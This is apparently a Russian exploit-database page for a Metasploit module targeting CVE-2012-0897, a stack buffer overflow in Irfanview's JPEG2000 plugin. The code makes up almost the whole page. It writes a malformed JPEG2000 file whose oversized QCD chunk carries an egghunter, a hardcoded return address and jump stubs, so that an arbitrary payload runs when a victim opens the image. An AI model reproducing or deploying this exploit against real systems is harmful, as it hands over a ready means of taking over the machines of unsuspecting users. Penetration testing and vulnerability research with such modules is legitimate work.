Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow

Свойства

Дата публикации:
30.06.2012
Цель:
Irfanview JPEG2000 <= v4.3.2.0 jp2
Тип воздействия:
Компрометация системы

Код

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Egghunter

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
            'Description'    => %q{
                    This module exploits a stack-based buffer overflow vulnerability in
                version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
                tested on a specific version of irfanview (v4.3.2), although other versions may
                work also. The vulnerability is triggered via parsing an invalid qcd chunk
                structure and specifying a malformed qcd size and data.

                Payload delivery and vulnerability trigger can be executed in multiple ways.
                The user can double click the file, use the file dialog, open via the icon
                and drag/drop the file into Irfanview\'s window. An egg hunter is used for
                stability.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
                    'mr_me <steventhomasseeley[at]gmail.com>',    # msf-fu
                    'juan vazquez'                                # more improvements
                ],
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'CVE', '2012-0897' ],
                    [ 'OSVDB', '78333'],
                    [ 'BID', '51426' ],
                    [ 'URL', 'http://www.greyhathacker.net/?p=525'; ],
                ],
            'Platform'          => [ 'win' ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Payload'           =>
                {
                    'Space'    => 4000,
                    'DisableNops' => true,
                },
            'Targets'        =>
                [
                    # push esp; retn [i_view32.exe]
                    # http://www.oldapps.com/irfanview.php?old_irfanview=7097
                    # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
                    [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
                ],
            'DisclosureDate' => 'Jan 16 2012',
            'DefaultTarget'  => 0))

            register_options(
                [
                    OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
                ], self.class)
    end

    # encode our string like unicode except we are not using nulls
    def encode_bytes(raw_bytes)
        encoded_bytes = ""
        0.step(raw_bytes.length-1, 2) { |i|
            encoded_bytes << raw_bytes[i+1]
            encoded_bytes << raw_bytes[i]
        }
        return encoded_bytes
    end

    def exploit
        jp2  = ""
        jp2 << "\x00\x00\x00\x0c"         #
        jp2 << "\x6a\x50\x20\x20"         # [jP  ] <0x6a502020> magic 0xd0a870a,len 12
        jp2 << "\x0d\x0a\x87\x0a"         #
        jp2 << "\x00\x00\x00\x14"         #
        jp2 << "\x66\x74\x79\x70"         #
        jp2 << "\x6a\x70\x32\x20"         #
        jp2 << "\x00\x00\x00\x00"         #         MinorVersion = 0      = [\0\0\0\0]
        jp2 << "\x6a\x70\x32\x20"         #         Compat = 0x6a703220 = [jp2 ]
        jp2 << "\x00\x00\x00\x38"         #
        jp2 << "\x75\x75\x69\x64"         # [uuid] <0x75756964> len 56 data offset 8
        jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
        jp2 << "\xd5\x11\xb2\xed\x00\x50" #
        jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
        jp2 << "\x00\x00\x40\x01\x00\x00" #
        jp2 << "\x00\x00\x00\x00\x60\x09" #
        jp2 << "\x00\x00\x00\x00\x00\x00" #
        jp2 << "\x00\x00\x00\x00\x00\x00" #
        jp2 << "\x00\x00\x30\x00\x00\x00" #
        jp2 << "\x00\x00\x00\x2d"         #
        jp2 << "\x6a\x70\x32\x68"         # [jp2h] <0x6a703268> len 45 data offset 8
        jp2 << "\x00\x00\x00\x16"         #
        jp2 << "\x69\x68\x64\x72"         # [ihdr] <0x69686472> len 22 data offset 8
        jp2 << "\x00\x00\x00\x0a"         #         ImageHeight = 10
        jp2 << "\x00\x00\x00\x0a"         #         ImageWidth = 10
        jp2 << "\x00\x03"                 #         NumberOfComponents = 3
        jp2 << "\x07"                     #         BitsPerComponent = 7
        jp2 << "\x07"                     #         Compression = 7
        jp2 << "\x01"                     #         Colorspace = 0x1 = unknown
        jp2 << "\x00\x00\x00\x00\x0f"     #
        jp2 << "\x63\x6f\x6c\x72"         # [colr] <0x636f6c72> len 15 data offset 8
        jp2 << "\x01"                     #         Method = 1
        jp2 << "\x00"                     #         Precedence = 0
        jp2 << "\x00"                     #         ColorSpaceAproximation = 0
        jp2 << "\x00\x00\x00"             #         EnumeratedColorSpace = 16 = sRGB
        jp2 << "\x10\x00\x00\x00\x00"     #
        jp2 << "\x6a\x70\x32\x63"         # [jp2c] <0x6a703263> length 0 data offset 8
        jp2 << "\xff\x4f"                 # <0xff4f=JP2C_SOC> Start of codestream
        jp2 << "\xff\x51"                 # <0xff51=JP2C_SIZ> length 47
        jp2 << "\x00\x2f"                 #         47 bytes
        jp2 << "\x00\x00"                 #         Capabilities = 0
        jp2 << "\x00\x00\x00\x0a"         #         GridWidth = 10
        jp2 << "\x00\x00\x00\x0a"         #         GridHeight = 10
        jp2 << "\x00\x00\x00\x00"         #         XImageOffset = 0
        jp2 << "\x00\x00\x00\x00"         #         YImageOffset = 0
        jp2 << "\x00\x00\x00\x0a"         #         TileWidth = 10
        jp2 << "\x00\x00\x00\x0a"         #         TileHeight = 10
        jp2 << "\x00\x00\x00\x00"         #         Xtileoffset = 0
        jp2 << "\x00\x00\x00\x00"         #         Ytileoffset = 0
        jp2 << "\x00\x03"                 #         NumberOfComponents = 3
        jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
        jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
        jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
        jp2 << "\xff\x52"                 # <0xff52=JP2C_COD> length 12
        jp2 << "\x00\x0c"                 #   12 bytes
        jp2 << "\x00"                     #   codingStyle=0=entropy coder w/o partition
        jp2 << "\x00"                     #   ProgressionOrder = 0
        jp2 << "\x00\x05"                 #   NumberOfLayers = 0x5
        jp2 << "\x01"                     #   MultiComponentTransform=0x1=5/3 reversible
        jp2 << "\x05"                     #   DecompLevels = 5
        jp2 << "\x04"                     #   CodeBlockWidthExponent=0x4+2 # cbw ->64
        jp2 << "\x04"                     #   CodeBlockHeightExponent=0x4+2 # cbh ->64
        jp2 << "\x00"                     #   CodeBLockStyle = 0
        jp2 << "\x00"                     #   QMIFBankId = 0

        eggoptions =
        {
            :checksum => false,
            :eggtag => 'pwnd'
        }

        hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
        qcd_data  = ""
        qcd_data << make_nops(10)
        qcd_data << encode_bytes(hunter)
        qcd_data << rand_text_alpha(146)

        jmp_hunter = %q{
            jmp $-0xad
            inc ecx
        }

        # jump to our egghunter
        jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string

        qcd_data << encode_bytes(jmp_hunter)
        qcd_data << rand_text_alpha(196-qcd_data.length)
        qcd_data << encode_bytes([target.ret].pack("V"))

        # align ecx and jmp
        pivot = %q{
            inc ch
            jmp ecx
        }

        pivot  = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string

        qcd_data << encode_bytes(pivot)
        qcd_data << egg

        jp2 << "\xff\x5c"                         # start
        jp2 << "\x00\xf5"                         # arbitrary size to trigger overflow
        jp2 << "\x22"                             # guard
        jp2 << qcd_data                           # malicious code
        jp2 << "\xff\x90"                         # <0xff90=JP2C_SOT>len 10
        jp2 << "\x00\x0a"                         # 10 bytes
        jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
        jp2 << "\xff\x93"                         # <0xff93=JP2C_SOD> Start of data
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
        jp2 << "\x80\x80"
        jp2 << "\xff\xd9"

        # Create the file
        print_status("Creating '#{datastore['FILENAME']}' file...")

        file_create(jp2)
    end

end

или введите имя

CAPTCHA